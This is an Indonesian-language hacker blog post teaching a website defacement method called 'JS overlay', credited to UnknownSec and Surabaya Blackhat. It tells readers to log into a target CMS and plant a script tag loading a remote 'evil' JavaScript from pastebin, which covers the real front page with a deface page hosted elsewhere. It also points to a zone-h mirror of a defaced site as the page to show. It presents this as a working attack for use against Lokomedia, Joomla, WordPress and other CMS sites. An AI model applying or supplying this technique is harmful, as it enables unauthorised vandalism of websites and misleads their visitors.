Hello Brother and Sister~ Kali ini UnknownSec akan berbagi teknik deface yang jarang digunakan mungkin karena ini menjadi alternatif terakhir ketika kita gagal memasang backdoor pada web target. Ada kalanya sebuah website tidak support file php [tapi ini masih bisa ditamper], atau web tersebut tidak menyediakan fasilitad upload. Cara yang tepat saat terjadi kejadian seperti diatas adalah menutup halaman depan dengan sebuah 'evil' Javascript.
Cara kerjanya berbeda dengan teknik deface yang biasanya dengan mengupload shell terlebih dahulu sebelum tebas indexnya. Jika shell terupload, maka biasanya script asli yang diganti. Namun untuk JS Overlay, halaman asli web tersebut "ditimpa" oleh halaman deface yang kita buat. Jadi halaman asli tersebut tetap ada namun ditutup oleh script deface kita.
Caranya ?
Bahan:
- Script deface yang sudah ditertanam di web lain afau kalian bisa upload di hosting kalian
*ini hanya "umpan" agar tampilan deface kita tampil di website target
-Evil Script yang tertatam di web lain juga. Bisa juga upload di pastebin
Silahkan modifikasi sendiri bagian "Hacked by" dan source deface nya. Disini saya menggunakan script yang sudah termirror di zone-h.org .
(edit bagian : http://zonehmirrors.org/defaced/2016/10/22/msdental.com.br/msdental.com.br/k.php)
(edit bagian : http://zonehmirrors.org/defaced/2016/10/22/msdental.com.br/msdental.com.br/k.php)
Sebagai contoh, target kita kali ini adalah Lokomedia. Seharusnya bisa upload shell. namun sudah saya coba berkali-kali tidak bisa. Mungkin sudah diantisipasi oleh Webmasternya. Makanya saya coba menggunakan metode JS Overlay.
Oke, kita mulai tutorialnya :
- Login ke web target. Buat post baru/kalian bisa mengedit judul/nama dari web tersebut.
<script type="text/javascript" src="http://pastebin.com/raw/Za6HM0qL"></script>
Untuk tulisan berwarna merah silahkan diganti dengan url kalian sendiri. Intinya kita memanggil script dari url tersebut untuk menutupi halaman yang akan kita deface.
Setelah di save, kita coba buka situs yang telah di tanam script js overlay tadi.
©LinuxSec
Taaraaaaa!!....
Teknik ini bisa digunakan di semua CMS. Entah itu Lokomedia, Joomla, WP, dll.
Kekurangannya, kita tidak punya akses ke server karena tidak ada backdoor yang tertanam.
Thanks to BagsFreakz from Surabaya Blackhat.
Sumber:
http://exploit.linuxsec.org/2013/04/tutorial-deface-dengan-js-overlay.html
0 komentar:
Posting Komentar